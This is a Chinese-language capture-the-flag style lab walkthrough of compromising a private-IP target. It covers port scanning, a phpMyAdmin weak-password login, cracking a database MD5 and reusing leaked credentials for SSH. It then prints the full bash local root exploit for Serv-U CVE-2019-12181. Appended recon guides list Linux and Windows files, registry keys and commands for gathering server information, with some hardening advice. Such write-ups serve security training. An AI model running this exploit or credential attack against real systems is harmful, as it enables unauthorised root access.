 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.195.211 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.195.211
 9sudo nmap --script=vuln -p$ports -Pn 192.168.195.211
10# 扫描目录
11gobuster dir -e -u http://192.168.195.211 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
12whatweb http://192.168.195.211/

扫描结果如下：

 1┌──(kali㉿kali)-[~]
 2└─$ ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.195.211 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 3
 4┌──(kali㉿kali)-[~]
 5└─$ echo $ports
 622,80,15552,17682,34185,35675
 7
 8┌──(kali㉿kali)-[~]
 9└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.195.211
10Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 01:55 -0400
11Nmap scan report for 192.168.195.211
12Host is up (0.22s latency).
13
14PORT STATE SERVICE VERSION
1522/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
16| ssh-hostkey:
17| 2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
18| 256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
19|_ 256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
2080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
21|_http-title: Apache2 Ubuntu Default Page: It works
22|_http-server-header: Apache/2.4.29 (Ubuntu)
2315552/tcp closed unknown
2417682/tcp closed unknown
2534185/tcp closed unknown
2635675/tcp closed unknown
27Device type: general purpose
28Running: Linux 5.X
29OS CPE: cpe:/o:linux:linux_kernel:5
30OS details: Linux 5.0 - 5.14
31Network Distance: 4 hops
32Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
33
34OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
35Nmap done: 1 IP address (1 host up) scanned in 53.84 seconds
36
37┌──(kali㉿kali)-[~]
38└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.195.211
39Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 01:56 -0400
40Nmap scan report for 192.168.195.211
41Host is up (0.23s latency).
42
43PORT STATE SERVICE
4422/tcp open ssh
4580/tcp open http
46|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
47|_http-csrf: Couldn't find any CSRF vulnerabilities.'
48|_http-dombased-xss: Couldn't find any DOM based XSS.
49|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
50| http-enum:
51| /robots.txt: Robots file
52| /phpinfo.php: Possible information file
53|_ /phpmyadmin/: phpMyAdmin
5415552/tcp closed unknown
5517682/tcp closed unknown
5634185/tcp closed unknown
5735675/tcp closed unknown
58
59Nmap done: 1 IP address (1 host up) scanned in 265.92 seconds

主页是个配置页面没什么查看robots.txt 发现隐藏目录

admin
wordpress
user
election

打开目录是一个投票页面提示登录admin后给候选人投票

根据Nmap扫描结果发现有php页面，看到还开放了文件包含

Nmap扫描发现phpmyadmin后台管理页面

phpMyAdmin 弱密码登录

爆破弱密码使用

https://github.com/bmth666/phpMyAdminCrack.git

复制一个字典过来

cp /usr/share/wordlists/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt ./wordlists/password.txt

弱密码登录即可

 root toor

发现存在疑似用户id和密码的表解码这个md5得到一个密码

bb113886b0513a9d882e3caa5cd73314

此时我们得到的信息是

id	no_induk	nama	level	password
1	1234	Love	1	bb113886b0513a9d882e3caa5cd73314

1234 Love Zxc123!@#

投票系统log泄露密码

把投票页面补全admin，http://192.168.195.211/election/admin 尝试登陆到后台发现要输入ID，就输入1234

在输入密码 Zxc123!@#

系统设置里面有个查看log的选项，点开查看发现泄露的密码。结合之前的Nmap扫描结果，怀疑这个密码是ssh登录的密码

Assigned Password for the user love: P@$$w0rd@123

SSH登录

获得local.txt的flag

ssh love@192.168.195.211

提权root

查找提权点

find / -type f -perm -u=s 2>/dev/null

发现异常文件

/usr/local/Serv-U/Serv-U

尝试运行查看所在目录，发现版本信息文件提示了软件版本号 Serv-U File Server (64-bit) - Version 15.1 (15.1.6.25)，搜索相关漏洞

发现两个Poc均指向漏洞编号 CVE-2019-12181

https://github.com/trickest/cve/blob/main/2019/CVE-2019-12181.md

c脚本还需要编译，所以先使用sh脚本的版本，尝试开启http传输发现网络波动太大，传输有问题，所以直接复制sh文件内容，使用cat > exp.sh 的方法写入，按ctrl D结束，然后添加执行权限。

 1#!/bin/bash
 2# SUroot - Local root exploit for Serv-U FTP Server versions prior to 15.1.7 (CVE-2019-12181)
 3# Bash variant of Guy Levin's Serv-U FTP Server exploit:
 4# - https://github.com/guywhataguy/CVE-2019-12181
 5# ---
 6# user@debian-9-6-0-x64-xfce:~/Desktop$ ./SUroot
 7# [*] Launching Serv-U ...
 8# sh: 1: : Permission denied
 9# [+] Success:
10# -rwsr-xr-x 1 root root 117208 Jun 28 23:21 /tmp/sh
11# [*] Launching root shell: /tmp/sh
12# sh-4.4# id
13# uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),117(scanner)
14# ---
15# <bcoles@gmail.com>
16# https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181
17
18if ! test -u "/usr/local/Serv-U/Serv-U"; then
19 echo '[-] /usr/local/Serv-U/Serv-U is not setuid root'
20 exit 1
21fi
22
23echo "[*] Launching Serv-U ..."
24
25/bin/bash -c 'exec -a "\";cp /bin/bash /tmp/sh; chown root /tmp/sh; chmod u+sx /tmp/sh;\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
26
27if ! test -u "/tmp/sh"; then
28 echo '[-] Failed'
29 /bin/rm "/tmp/sh"
30 exit 1
31fi
32
33echo '[+] Success:'
34/bin/ls -la /tmp/sh
35
36echo "[*] Launching root shell: /tmp/sh"
37/tmp/sh -p

C脚本的方法尝试也成功了

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.168]
 B[靶机 
 192.168.195.211]
 C[election目录 ]
 D[phpmyadmin后台 ]
 E[SSH登录]
 F[root]
 
 %% 路径关系
 A-->|扫描|B
 B-->|robots.txt泄露|C
 A-->|Nmap扫描|D
 D-->|数据库md5解密得到election投票管理员密码|C
 C-->|管理员界面log页面泄露SSH登录密码|E
 E-->|CVE-2019-12181 漏洞提权|F

	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% 应用样式
 class A attack;
 class B,D public;
 class C internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2026-03-13 13:30, 2026-03-13 14:09
 漏洞识别 :a2, after a1, 2026-03-13 14:51
 
 section 攻击阶段
 初始访问 :b1, after a2, 3m
 权限提升 :crit,b2, after b1, 2026-03-13 15:20

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

推荐阅读

Linux服务器端口和基本信息侦察指南

Wed, 22 Oct 2025 22:21:58 +0000

Linux服务器端口和基本信息侦察指南

在渗透测试或安全评估中,了解目标服务器开放的端口和基本信息是至关重要的第一步。服务器通常不会直接展示所有开放端口和详细信息,但通过一些常见的服务和文件,攻击者可以获取这些信息。以下是服务器上常见的文件、服务和配置,它们可能直接或间接地透露开放的端口和服务器的基本信息。

参考：作为运维，应该掌握的 50 个 Linux 上重要的配置文件

1. 基础系统信息文件

1.1. `/etc/services`

描述: 该文件包含了服务名称与端口号及协议的映射关系。虽然它不显示当前服务器实际开放的端口,但它列出了常见的服务及其默认端口,攻击者可以借此了解哪些端口通常用于哪些服务。

路径: /etc/services
用途: 了解常见服务的默认端口,辅助端口扫描和识别

示例内容:

http 80/tcp www www-http # WorldWideWeb HTTP
ssh 22/tcp # SSH Remote Login Protocol
ftp 21/tcp # File Transfer Protocol

1.2. `/etc/hosts`

描述: 该文件用于将主机名映射到IP地址,通常用于本地网络解析。虽然它不直接显示开放的端口,但可以揭示服务器上配置的主机名和内部IP地址。

路径: /etc/hosts
用途: 了解服务器的主机名配置和内部网络结构

示例内容:

127.0.0.1 localhost
192.168.1.10 server1.example.com

1.3. `/etc/hostname`

描述: 该文件包含服务器的主机名。通过查看此文件,攻击者可以了解服务器的名称,有助于进一步的侦察。

路径: /etc/hostname
用途: 获取服务器的主机名

示例内容:

webserver01

1.4. `/etc/resolv.conf`

描述: DNS解析器配置文件。

路径: /etc/resolv.conf
用途: 了解DNS服务器配置,可能揭示内部网络结构

2. 网络连接和端口信息

2.1. `/proc/net/tcp` 和 `/proc/net/udp`

描述: 这些文件提供了当前系统上TCP和UDP连接的状态信息,包括本地和远程地址及端口。通过解析这些文件,可以获取服务器当前活跃的连接和监听端口。

路径:
- TCP: /proc/net/tcp
- UDP: /proc/net/udp
用途: 查看当前系统上的TCP和UDP连接及监听端口

注意: 这些文件的内容是十六进制格式的,需要一定的解析技巧。通常可以使用工具或脚本来解析这些信息。

示例(简化):

sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
 0: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 12345 1 ffff880012345678 100 0 0 10 0

local_address中的端口部分(如 1F90)需要转换为十进制(8080)

2.2. `/proc/net/tcp6` 和 `/proc/net/udp6`

描述: IPv6连接的TCP和UDP状态信息。

路径: /proc/net/tcp6, /proc/net/udp6
用途: 查看IPv6监听端口和连接

2.3. `/proc/net/unix`

描述: Unix域套接字信息。

路径: /proc/net/unix
用途: 了解本地进程间通信(IPC)使用的套接字

2.4. 运行时进程信息

路径:

/proc/[pid]/cmdline: 进程启动命令行
/proc/[pid]/environ: 进程环境变量

用途: 查看服务启动参数和环境变量,可能包含端口绑定信息

3. 网络配置文件

3.1. RHEL/CentOS 网络配置

描述: 网络接口配置文件。

路径: /etc/sysconfig/network-scripts/ifcfg-*
用途: 了解网络接口配置和IP地址

3.2. Debian/Ubuntu 网络配置

描述: 网络接口配置。

路径: /etc/network/interfaces
用途: 查看网络配置和绑定的IP地址

3.3. 网络接口系统信息

描述: 网络接口状态和配置。

路径: /sys/class/net/*/
用途: 查看网络接口状态和配置

4. 超级服务器配置

4.1. `/etc/inetd.conf` 或 `/etc/xinetd.conf`

描述: 这些文件配置了由 inetd或 xinetd管理的服务,这些服务在需要时启动并监听特定端口。

路径:
- inetd: /etc/inetd.conf
- xinetd: /etc/xinetd.conf 或 /etc/xinetd.d/ 目录下的各个文件
用途: 了解由超级服务器管理的服务及其端口

5. Web服务器配置

5.1. Nginx 配置

描述: Nginx的配置文件定义了服务器监听的端口和虚拟主机配置。

路径:
- 主配置: /etc/nginx/nginx.conf
- 站点配置: /etc/nginx/sites-enabled/ 或 /etc/nginx/conf.d/
用途: 查看Nginx监听的端口和处理的站点

5.2. Apache 配置

描述: Apache的配置文件定义了服务器监听的端口和虚拟主机配置。

路径:
- 端口配置: /etc/apache2/ports.conf
- 站点配置: /etc/apache2/sites-enabled/ 或 /etc/apache2/sites-available/
用途: 查看Apache监听的端口和处理的站点

6. 数据库服务配置

6.1. MySQL/MariaDB

路径: /etc/mysql/my.cnf 或 /etc/my.cnf
用途: 查看数据库监听端口(默认3306)和绑定地址

6.2. PostgreSQL

路径: /etc/postgresql/*/main/postgresql.conf
用途: 查看PostgreSQL监听端口和地址

6.3. Redis

路径: /etc/redis/redis.conf
用途: 查看Redis监听端口(默认6379)

6.4. MongoDB

路径: /etc/mongod.conf
用途: 查看MongoDB监听端口(默认27017)

7. 其他网络服务配置

7.1. SSH 配置

路径: /etc/ssh/sshd_config
用途: 查看SSH监听端口(默认22,可能被修改)

7.2. FTP 服务

路径:

vsftpd: /etc/vsftpd.conf
ProFTPD: /etc/proftpd/proftpd.conf

用途: 查看FTP监听端口和配置

7.3. Samba

路径: /etc/samba/smb.conf
用途: 查看SMB/CIFS共享配置

8. 防火墙配置

8.1. iptables

描述: 防火墙规则可以揭示哪些端口是开放的或被允许的。

查看命令: iptables -L -n
配置文件路径: /etc/iptables/rules.v4 或 /etc/sysconfig/iptables(取决于发行版)
用途: 查看防火墙允许的端口和流量规则

8.2. ufw (Uncomplicated Firewall)

查看命令: ufw status
配置文件路径: /etc/ufw/ 目录下
用途: 查看防火墙允许的端口和服务

8.3. firewalld

查看命令: firewall-cmd --list-all
配置文件路径: /etc/firewalld/ 目录下
用途: 查看防火墙允许的服务和端口

9. Systemd 服务管理

9.1. Systemd 服务文件

路径:
- /etc/systemd/system/
- /lib/systemd/system/
用途: 查看通过systemd管理的服务及其配置,可能包含端口信息

10. 容器和虚拟化

10.1. Docker

路径:

/etc/docker/daemon.json
Docker容器信息: docker ps (如果有权限)

用途: 查看Docker端口映射和暴露的服务

10.2. Kubernetes 配置

路径:

~/.kube/config
服务配置: Kubernetes Service和Ingress定义

用途: 查看暴露的服务端口

10.3. 云提供商元数据服务

访问: 通常通过 http://169.254.169.254/
用途: 获取实例元数据,可能包含网络配置信息

11. 系统日志文件

路径:

/var/log/syslog 或 /var/log/messages: 系统日志
/var/log/auth.log 或 /var/log/secure: 认证日志
/var/log/apache2/access.log: Apache访问日志
/var/log/nginx/access.log: Nginx访问日志

用途: 可能包含连接尝试、服务启动信息等

12. 安全策略配置

12.1. SELinux

路径: /etc/selinux/config
查看命令: sestatus
用途: 了解安全策略,可能影响端口访问

12.2. AppArmor

路径: /etc/apparmor.d/
用途: 了解应用程序安全配置文件

13. 定时任务

13.1. Cron 任务

路径:

/etc/crontab
/etc/cron.d/
/var/spool/cron/

用途: 可能包含定期执行的网络服务或端口扫描脚本

14. 应用程序特定配置

14.1. Java 应用

配置文件: application.properties 或 application.yml

14.2. Node.js 应用

配置文件: package.json, .env 文件

14.3. Python 应用

配置文件: settings.py, .env 文件

15. 如何利用这些文件和服务获取信息

15.1. 手动查看

如果有对服务器的Shell访问权限，可以直接查看上述文件，以获取端口和服务信息。示例命令：

# 查看 /etc/services
cat /etc/services

15.1.1. 查看进程

1ps aux

用途: 查看当前运行的进程,可以识别出哪些服务正在运行

15.1.2. 查看监听端口

1sudo netstat -tuln
2# 或
3sudo ss -tuln

输出示例:

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp6 0 0 
22 
* LISTEN
tcp6 0 0 
80 
* LISTEN

说明:

0.0.0.0:22 表示SSH服务在所有接口的22端口监听
0.0.0.0:80 表示HTTP服务在所有接口的80端口监听

注意: 这些命令需要适当的权限(通常是root)才能查看所有监听端口

15.1.3. 查看打开的文件和网络连接

1lsof -i
2# 或查看特定端口
3lsof -i :端口号

用途: 列出打开的网络连接和监听端口

15.2. 自动化工具

使用自动化工具进行端口扫描和服务识别，可以更高效地获取服务器的开放端口和基本信息。- Nmap：强大的网络扫描工具，可以扫描目标服务器的开放端口、运行的服务及其版本。示例命令：

nmap -sV target_ip

说明：

-sV：探测服务版本信息。
Netcat (nc)：可以用于手动连接和探测端口。示例命令：

nc -zv target_ip 1-1000

说明：

-z：扫描模式，不发送数据。
-v：详细输出。

15.3. Web 服务器信息泄露

有时候，Web服务器配置不当，可能会在网页响应头、错误页面或特定URL中泄露服务器信息，包括运行的服务、版本号和开放的端口。

常见信息泄露点：- HTTP 响应头：如 Server: Apache/2.4.41 (Ubuntu)，透露了Web服务器类型和版本。
- 错误页面：如404、500错误页面，可能包含服务器信息。
- 特定URL：如 /phpinfo.php、/admin/等，可能泄露服务器配置。注意：这些信息通常需要通过Web请求获取，而非直接查看服务器文件。—## 3. 安全建议为了防止攻击者通过上述文件和服务获取服务器的敏感信息，建议采取以下安全措施：1. 限制文件访问权限：
- 确保敏感配置文件（如 /etc/hosts、/etc/passwd等）的权限设置正确，避免不必要的读取权限。
隐藏或移除敏感信息：
- 避免在Web应用的错误页面、响应头中泄露服务器信息。
- 移除或禁用不必要的服务，减少攻击面。
使用防火墙：
- 配置防火墙（如 iptables、ufw、firewalld）仅允许必要的端口和流量，限制对管理端口（如SSH的22端口）的访问。
定期更新和打补丁：
- 保持服务器操作系统和软件包的最新状态，修补已知的安全漏洞。
使用安全配置：
- 遵循最小权限原则，仅运行必要的服务，使用强密码和密钥认证。
监控和日志审计：
- 实施日志监控，及时发现异常访问和潜在的攻击行为。

安全建议

最小权限原则: 限制对敏感配置文件的访问权限
定期审计: 定期检查开放的端口和运行的服务
防火墙配置: 只开放必要的端口
日志监控: 监控异常的访问尝试和配置文件访问
文件完整性监控: 使用工具(如AIDE、Tripwire)监控关键配置文件的变化
禁用不必要的服务: 关闭不需要的网络服务以减少攻击面

Windows服务器端口和基本信息侦察指南

在Windows环境中进行渗透测试或安全评估时,了解目标服务器开放的端口和基本信息同样至关重要。Windows服务器通过注册表、配置文件和各种服务来管理网络配置。以下是Windows服务器上常见的文件、注册表项和服务,它们可能直接或间接地透露开放的端口和服务器的基本信息。

参考：【2024/3/12 更新】Windows Server 2019 服务配置与管理汇总

1. 系统基本信息

1.1. 主机名和网络配置

1.1.1. 计算机名称

位置:

注册表: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
文件: 可通过命令 hostname 获取

用途: 获取服务器的计算机名称

1.1.2. Hosts 文件

路径: C:\Windows\System32\drivers\etc\hosts

用途: 了解本地DNS解析配置,可能揭示内部主机名和IP地址映射

示例内容:

127.0.0.1 localhost
192.168.1.10 server1.domain.local
10.0.0.50 database.internal.com

1.1.3. Networks 文件

路径: C:\Windows\System32\drivers\etc\networks

用途: 网络名称与网络地址的映射

1.1.4. Services 文件

路径: C:\Windows\System32\drivers\etc\services

描述: 包含服务名称与端口号及协议的映射关系,类似Linux的 /etc/services

用途: 了解常见Windows服务的默认端口

示例内容:

http 80/tcp
https 443/tcp
smb 445/tcp
rdp 3389/tcp

2. 注册表中的网络配置

2.1. TCP/IP 配置

路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

重要键值:

Hostname: 主机名
Domain: 域名
NameServer: DNS服务器地址
DhcpNameServer: DHCP分配的DNS服务器

用途: 查看网络配置和DNS设置

2.2. 网络接口配置

路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID}

重要键值:

IPAddress: 静态IP地址
SubnetMask: 子网掩码
DefaultGateway: 默认网关
DhcpIPAddress: DHCP分配的IP地址

用途: 查看每个网络接口的详细配置

2.3. 端口代理配置

路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy

用途: 查看配置的端口转发规则

3. Windows防火墙配置

3.1. 防火墙规则

路径:

配置文件: C:\Windows\System32\LogFiles\Firewall\pfirewall.log
注册表: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy

PowerShell命令:

1Get-NetFirewallRule | Where-Object {$_.Enabled -eq 'True'}
2Get-NetFirewallPortFilter

用途: 查看防火墙允许的端口和服务

3.2. Windows Defender 防火墙配置文件

路径: C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\

用途: VPN和远程连接配置

4. IIS (Internet Information Services) 配置

4.1. IIS 配置文件

路径:

主配置: C:\Windows\System32\inetsrv\config\applicationHost.config
站点配置: C:\inetpub\wwwroot\web.config
应用程序配置: 各站点目录下的 web.config

用途: 查看IIS监听的端口、绑定的域名和虚拟目录配置

关键配置节点:

1<sites>
2 <site name="Default Web Site" id="1">
3 <bindings>
4 <binding protocol="http" bindingInformation="*:80:" />
5 <binding protocol="https" bindingInformation="*:443:" />
6 </bindings>
7 </site>
8</sites>

4.2. IIS 日志文件

默认路径: C:\inetpub\logs\LogFiles\

用途: 分析访问记录、连接来源和请求模式

5. 远程桌面服务 (RDP)

5.1. RDP 配置

注册表路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server

重要键值:

fDenyTSConnections: 0=允许RDP连接, 1=禁用
PortNumber: RDP监听端口(默认3389)

注册表路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

用途: 查看RDP服务是否启用及监听端口

6. 数据库服务配置

6.1. Microsoft SQL Server

配置文件路径:

SQL Server 2019: C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\
配置管理器: SQL Server Configuration Manager

注册表路径: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\

日志路径: C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Log\

用途: 查看SQL Server监听端口(默认1433)和实例配置

常用命令:

1Get-Service | Where-Object {$_.Name -like "*SQL*"}

6.2. MySQL/MariaDB (Windows版本)

配置文件:

C:\ProgramData\MySQL\MySQL Server 8.0\my.ini
C:\Program Files\MySQL\MySQL Server 8.0\my.ini

用途: 查看MySQL监听端口(默认3306)和绑定地址

6.3. PostgreSQL (Windows版本)

配置文件: C:\Program Files\PostgreSQL\[version]\data\postgresql.conf

用途: 查看PostgreSQL监听端口和地址

7. 文件共享服务

7.1. SMB/CIFS 共享

查看命令:

1Get-SmbShare
2net share

注册表路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares

用途: 查看共享文件夹配置(使用端口445)

7.2. FTP 服务

IIS FTP配置: 包含在 applicationHost.config 中

路径: C:\Windows\System32\inetsrv\config\applicationHost.config

用途: 查看FTP站点绑定和端口(默认21)

8. 邮件服务

8.1. Microsoft Exchange Server

安装路径: C:\Program Files\Microsoft\Exchange Server\

配置路径:

C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\
C:\Program Files\Microsoft\Exchange Server\V15\Bin\

用途: 查看Exchange监听的端口:

SMTP: 25
POP3: 110
IMAP: 143
HTTPS (OWA): 443

8.2. SMTP 服务

IIS SMTP配置:

元数据库: C:\Windows\System32\inetsrv\MetaBase.xml

用途: 查看SMTP中继配置和端口

9. DNS 服务

9.1. Windows DNS Server

配置文件路径: C:\Windows\System32\dns\

区域文件: C:\Windows\System32\dns\*.dns

日志路径: C:\Windows\System32\dns\dns.log

用途: 查看DNS区域配置和解析记录(默认端口53)

10. Active Directory 相关

10.1. Active Directory 配置

数据库路径: C:\Windows\NTDS\ntds.dit

日志路径: C:\Windows\debug\netlogon.log

重要端口:

LDAP: 389
LDAPS: 636
Global Catalog: 3268, 3269
Kerberos: 88

注册表路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters

10.2. 组策略对象 (GPO)

路径: C:\Windows\SYSVOL\domain\Policies\

用途: 可能包含网络配置、防火墙规则等策略

11. Web应用服务器

11.1. Apache (Windows版本)

配置文件:

主配置: C:\Apache24\conf\httpd.conf
虚拟主机: C:\Apache24\conf\extra\httpd-vhosts.conf

用途: 查看Apache监听的端口和虚拟主机配置

11.2. Tomcat

配置文件: C:\Program Files\Apache Software Foundation\Tomcat 9.0\conf\server.xml

用途: 查看Tomcat监听端口(默认8080, 8443)

11.3. nginx (Windows版本)

配置文件: C:\nginx\conf\nginx.conf

用途: 查看nginx监听端口和服务器配置

12. 应用程序配置

12.1. .NET 应用程序

配置文件:

web.config (Web应用)
app.config (桌面应用)
appsettings.json (.NET Core)

常见位置: 应用程序根目录

用途: 可能包含数据库连接字符串、API端点等信息

12.2. Java 应用程序

配置文件:

application.properties
application.yml
server.xml

用途: 查看应用监听端口和服务配置

13. VPN和远程访问

13.1. RRAS (Routing and Remote Access Service)

注册表路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess

配置文件: 通过远程访问管理控制台配置

用途: 查看VPN配置和端口:

PPTP: 1723
L2TP: 1701
IKEv2: 500, 4500

13.2. VPN连接配置

路径: C:\Users\[Username]\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk

用途: 查看保存的VPN连接配置

14. 系统服务和端口

14.1. 服务列表

注册表路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\

查看命令:

1Get-Service
2sc query

用途: 列出所有已安装的服务,识别网络服务

14.2. 启动程序

注册表路径:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

文件系统路径:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

用途: 可能包含自动启动的网络服务或后门程序

15. 日志文件

15.1. Windows事件日志

访问方式: 事件查看器 (eventvwr.msc)

日志位置: C:\Windows\System32\winevt\Logs\

重要日志:

Security.evtx: 安全审计日志
System.evtx: 系统事件日志
Application.evtx: 应用程序日志

PowerShell命令:

1Get-EventLog -LogName Security -Newest 100
2Get-WinEvent -LogName Security

用途: 分析登录尝试、服务启动、网络连接等事件

15.2. IIS日志

路径: C:\inetpub\logs\LogFiles\W3SVC1\

用途: Web访问日志,包含IP地址、请求URI、状态码等

15.3. 防火墙日志

路径: C:\Windows\System32\LogFiles\Firewall\pfirewall.log

用途: 记录防火墙阻止或允许的连接

16. 常用PowerShell和CMD命令

16.1. 查看网络连接和监听端口

 1# 查看所有TCP连接和监听端口
 2netstat -ano
 3netstat -ano | findstr LISTENING
 4
 5# 使用PowerShell查看
 6Get-NetTCPConnection
 7Get-NetTCPConnection -State Listen
 8
 9# 查看UDP端口
10Get-NetUDPEndpoint

输出示例:

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 1000
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1234

16.2. 查看运行的进程

1# 查看所有进程
2Get-Process
3tasklist
4
5# 查看特定端口的进程
6netstat -ano | findstr :80
7Get-Process -Id [PID]

16.3. 查看已安装的程序和服务

1# 查看已安装程序
2Get-WmiObject -Class Win32_Product
3Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*
4
5# 查看服务
6Get-Service
7Get-Service | Where-Object {$_.Status -eq "Running"}

16.4. 查看网络配置

 1# 查看IP配置
 2ipconfig /all
 3Get-NetIPConfiguration
 4Get-NetIPAddress
 5
 6# 查看路由表
 7route print
 8Get-NetRoute
 9
10# 查看DNS缓存
11ipconfig /displaydns
12Get-DnsClientCache
13
14# 查看ARP缓存
15arp -a
16Get-NetNeighbor

16.5. 查看共享和权限

 1# 查看共享文件夹
 2net share
 3Get-SmbShare
 4
 5# 查看共享会话
 6net session
 7Get-SmbSession
 8
 9# 查看打开的文件
10openfiles /query
11Get-SmbOpenFile

16.6. 查看防火墙规则

 1# 查看防火墙状态
 2netsh advfirewall show allprofiles
 3Get-NetFirewallProfile
 4
 5# 查看防火墙规则
 6netsh advfirewall firewall show rule name=all
 7Get-NetFirewallRule | Where-Object {$_.Enabled -eq 'True'}
 8
 9# 查看特定端口的规则
10Get-NetFirewallPortFilter | Where-Object {$_.LocalPort -eq 80}

16.7. 查看计划任务

1# 查看计划任务
2schtasks /query /fo LIST /v
3Get-ScheduledTask | Where-Object {$_.State -eq "Ready"}

16.8. 查看用户和组

 1# 查看本地用户
 2net user
 3Get-LocalUser
 4
 5# 查看本地组
 6net localgroup
 7Get-LocalGroup
 8
 9# 查看登录会话
10query user
11qwinsta

17. WMI (Windows Management Instrumentation) 查询

17.1. 网络适配器配置

1Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Where-Object {$_.IPEnabled -eq $true}

17.2. 监听端口

1Get-WmiObject -Class Win32_Process | Where-Object {$_.Name -like "*server*"}

17.3. 已安装的软件

1Get-WmiObject -Class Win32_Product

18. 容器和虚拟化

18.1. Docker (Windows容器)

配置文件: C:\ProgramData\Docker\config\daemon.json

查看命令:

1docker ps
2docker port [container_id]

用途: 查看容器端口映射

18.2. Hyper-V

配置路径: 通过Hyper-V管理器查看

PowerShell命令:

1Get-VM
2Get-VMNetworkAdapter

用途: 查看虚拟机网络配置

19. 云和企业服务

19.1. Azure Arc

配置路径: C:\ProgramData\AzureConnectedMachineAgent\

用途: Azure混合云连接配置

19.2. System Center Configuration Manager (SCCM)

客户端路径: C:\Windows\CCM\

日志路径: C:\Windows\CCM\Logs\

用途: 企业配置管理信息

20. 安全相关配置

20.1. BitLocker配置

